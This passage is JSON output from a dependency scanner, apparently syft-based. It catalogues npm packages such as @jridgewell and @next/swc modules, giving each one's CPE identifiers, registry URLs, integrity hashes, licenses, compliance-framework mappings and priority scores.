"cpe:2.3:a:\\@jridgewell\\/resolve-uri:\\@jridgewell\\/resolve_uri:3.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@jridgewell\\/resolve_uri:\\@jridgewell\\/resolve-uri:3.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@jridgewell\\/resolve_uri:\\@jridgewell\\/resolve_uri:3.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@jridgewell\\/resolve:\\@jridgewell\\/resolve-uri:3.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@jridgewell\\/resolve:\\@jridgewell\\/resolve_uri:3.1.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40jridgewell/resolve-uri@3.1.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@jridgewell/resolve-uri/-/resolve-uri-3.1.2.tgz", "integrity": "sha512-bRISgCIjP20/tbWSPWMEi54QVPRZExkuD9lJL+UIxUKtwVJA8wW1Trb1jMs1RFXo1CBTNZ/5hpC9QvmKWdopKw==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "c541a28057efb07d", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @jridgewell/sourcemap-codec 1.5.5", "title": "@jridgewell/sourcemap-codec 1.5.5", "description": "Package discovered: @jridgewell/sourcemap-codec 1.5.5", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "47804e8101ff9015", "name": "@jridgewell/sourcemap-codec", "version": "1.5.5", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@jridgewell\\/sourcemap-codec:\\@jridgewell\\/sourcemap-codec:1.5.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@jridgewell\\/sourcemap-codec:\\@jridgewell\\/sourcemap_codec:1.5.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@jridgewell\\/sourcemap_codec:\\@jridgewell\\/sourcemap-codec:1.5.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@jridgewell\\/sourcemap_codec:\\@jridgewell\\/sourcemap_codec:1.5.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@jridgewell\\/sourcemap:\\@jridgewell\\/sourcemap-codec:1.5.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@jridgewell\\/sourcemap:\\@jridgewell\\/sourcemap_codec:1.5.5:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40jridgewell/sourcemap-codec@1.5.5", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.5.5.tgz", "integrity": "sha512-cYQ9310grqxueWbl+WuIUIaiUaDcj7WOq5fVhEljNVgRfOUhY9fy2zTvfoqWsnebh8Sl70VScFbICvJnLKB0Og==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "17f518740ec1a2d8", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @jridgewell/trace-mapping 0.3.31", "title": "@jridgewell/trace-mapping 0.3.31", "description": "Package discovered: @jridgewell/trace-mapping 0.3.31", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "d2b0bb94bbc32d3e", "name": "@jridgewell/trace-mapping", "version": "0.3.31", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@jridgewell\\/trace-mapping:\\@jridgewell\\/trace-mapping:0.3.31:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@jridgewell\\/trace-mapping:\\@jridgewell\\/trace_mapping:0.3.31:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@jridgewell\\/trace_mapping:\\@jridgewell\\/trace-mapping:0.3.31:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@jridgewell\\/trace_mapping:\\@jridgewell\\/trace_mapping:0.3.31:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@jridgewell\\/trace:\\@jridgewell\\/trace-mapping:0.3.31:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@jridgewell\\/trace:\\@jridgewell\\/trace_mapping:0.3.31:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40jridgewell/trace-mapping@0.3.31", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@jridgewell/trace-mapping/-/trace-mapping-0.3.31.tgz", "integrity": "sha512-zzNR+SdQSDJzc8joaeP8QQoCQr8NuYx2dIIytl1QeBEZHJ9uW6hebsrYgbz8hJwUQao3TWCMtmfV8Nu1twOLAw==", "dependencies": { "@jridgewell/resolve-uri": "^3.1.0", "@jridgewell/sourcemap-codec": "^1.4.14" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "104bcdf3fd6a7ac2", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @js-sdsl/ordered-map 4.4.2", "title": "@js-sdsl/ordered-map 4.4.2", "description": "Package discovered: @js-sdsl/ordered-map 4.4.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "886fcbec7936d83f", "name": "@js-sdsl/ordered-map", "version": "4.4.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@js-sdsl\\/ordered-map:\\@js-sdsl\\/ordered-map:4.4.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@js-sdsl\\/ordered-map:\\@js_sdsl\\/ordered_map:4.4.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@js_sdsl\\/ordered_map:\\@js-sdsl\\/ordered-map:4.4.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@js_sdsl\\/ordered_map:\\@js_sdsl\\/ordered_map:4.4.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@js-sdsl\\/ordered:\\@js-sdsl\\/ordered-map:4.4.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@js-sdsl\\/ordered:\\@js_sdsl\\/ordered_map:4.4.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@js_sdsl\\/ordered:\\@js-sdsl\\/ordered-map:4.4.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@js_sdsl\\/ordered:\\@js_sdsl\\/ordered_map:4.4.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@js:\\@js-sdsl\\/ordered-map:4.4.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@js:\\@js_sdsl\\/ordered_map:4.4.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40js-sdsl/ordered-map@4.4.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@js-sdsl/ordered-map/-/ordered-map-4.4.2.tgz", "integrity": "sha512-iUKgm52T8HOE/makSxjqoWhe95ZJA1/G1sYsGev2JDKUSS14KAgg1LHb+Ba+IPow0xflbnSkOsZcO08C7w1gYw==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "9fea893a2745b477", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @next/env 14.2.3", "title": "@next/env 14.2.3", "description": "Package discovered: @next/env 14.2.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "18ad44792e37660e", "name": "@next/env", "version": "14.2.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@next\\/env:\\@next\\/env:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40next/env@14.2.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@next/env/-/env-14.2.3.tgz", "integrity": "sha512-W7fd7IbkfmeeY2gXrzJYDx8D2lWKbVoTIj1o1ScPHNzvp30s1AuoEFSdr39bC5sjxJaxTtq3OTCZboNp0lNWHA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "258c6f6b4bc11247", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @next/swc-darwin-arm64 14.2.3", "title": "@next/swc-darwin-arm64 14.2.3", "description": "Package discovered: @next/swc-darwin-arm64 14.2.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "bdb25bdc1adfe20f", "name": "@next/swc-darwin-arm64", "version": "14.2.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@next\\/swc-darwin-arm64:\\@next\\/swc-darwin-arm64:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc-darwin-arm64:\\@next\\/swc_darwin_arm64:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc_darwin_arm64:\\@next\\/swc-darwin-arm64:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc_darwin_arm64:\\@next\\/swc_darwin_arm64:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc-darwin:\\@next\\/swc-darwin-arm64:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc-darwin:\\@next\\/swc_darwin_arm64:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc_darwin:\\@next\\/swc-darwin-arm64:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc_darwin:\\@next\\/swc_darwin_arm64:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc:\\@next\\/swc-darwin-arm64:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc:\\@next\\/swc_darwin_arm64:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40next/swc-darwin-arm64@14.2.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@next/swc-darwin-arm64/-/swc-darwin-arm64-14.2.3.tgz", "integrity": "sha512-3pEYo/RaGqPP0YzwnlmPN2puaF2WMLM3apt5jLW2fFdXD9+pqcoTzRk+iZsf8ta7+quAe4Q6Ms0nR0SFGFdS1A==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "297b85bfc16e4adc", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @next/swc-darwin-x64 14.2.3", "title": "@next/swc-darwin-x64 14.2.3", "description": "Package discovered: @next/swc-darwin-x64 14.2.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "b0a8be32ec095ef0", "name": "@next/swc-darwin-x64", "version": "14.2.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@next\\/swc-darwin-x64:\\@next\\/swc-darwin-x64:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc-darwin-x64:\\@next\\/swc_darwin_x64:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc_darwin_x64:\\@next\\/swc-darwin-x64:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc_darwin_x64:\\@next\\/swc_darwin_x64:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc-darwin:\\@next\\/swc-darwin-x64:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc-darwin:\\@next\\/swc_darwin_x64:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc_darwin:\\@next\\/swc-darwin-x64:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc_darwin:\\@next\\/swc_darwin_x64:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc:\\@next\\/swc-darwin-x64:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc:\\@next\\/swc_darwin_x64:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40next/swc-darwin-x64@14.2.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@next/swc-darwin-x64/-/swc-darwin-x64-14.2.3.tgz", "integrity": "sha512-6adp7waE6P1TYFSXpY366xwsOnEXM+y1kgRpjSRVI2CBDOcbRjsJ67Z6EgKIqWIue52d2q/Mx8g9MszARj8IEA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "eaf37f3f72892d80", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @next/swc-linux-arm64-gnu 14.2.3", "title": "@next/swc-linux-arm64-gnu 14.2.3", "description": "Package discovered: @next/swc-linux-arm64-gnu 14.2.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "b768ca89954904c7", "name": "@next/swc-linux-arm64-gnu", "version": "14.2.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@next\\/swc-linux-arm64-gnu:\\@next\\/swc-linux-arm64-gnu:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc-linux-arm64-gnu:\\@next\\/swc_linux_arm64_gnu:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc_linux_arm64_gnu:\\@next\\/swc-linux-arm64-gnu:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc_linux_arm64_gnu:\\@next\\/swc_linux_arm64_gnu:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc-linux-arm64:\\@next\\/swc-linux-arm64-gnu:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc-linux-arm64:\\@next\\/swc_linux_arm64_gnu:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc_linux_arm64:\\@next\\/swc-linux-arm64-gnu:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc_linux_arm64:\\@next\\/swc_linux_arm64_gnu:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc-linux:\\@next\\/swc-linux-arm64-gnu:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc-linux:\\@next\\/swc_linux_arm64_gnu:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc_linux:\\@next\\/swc-linux-arm64-gnu:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc_linux:\\@next\\/swc_linux_arm64_gnu:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc:\\@next\\/swc-linux-arm64-gnu:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": 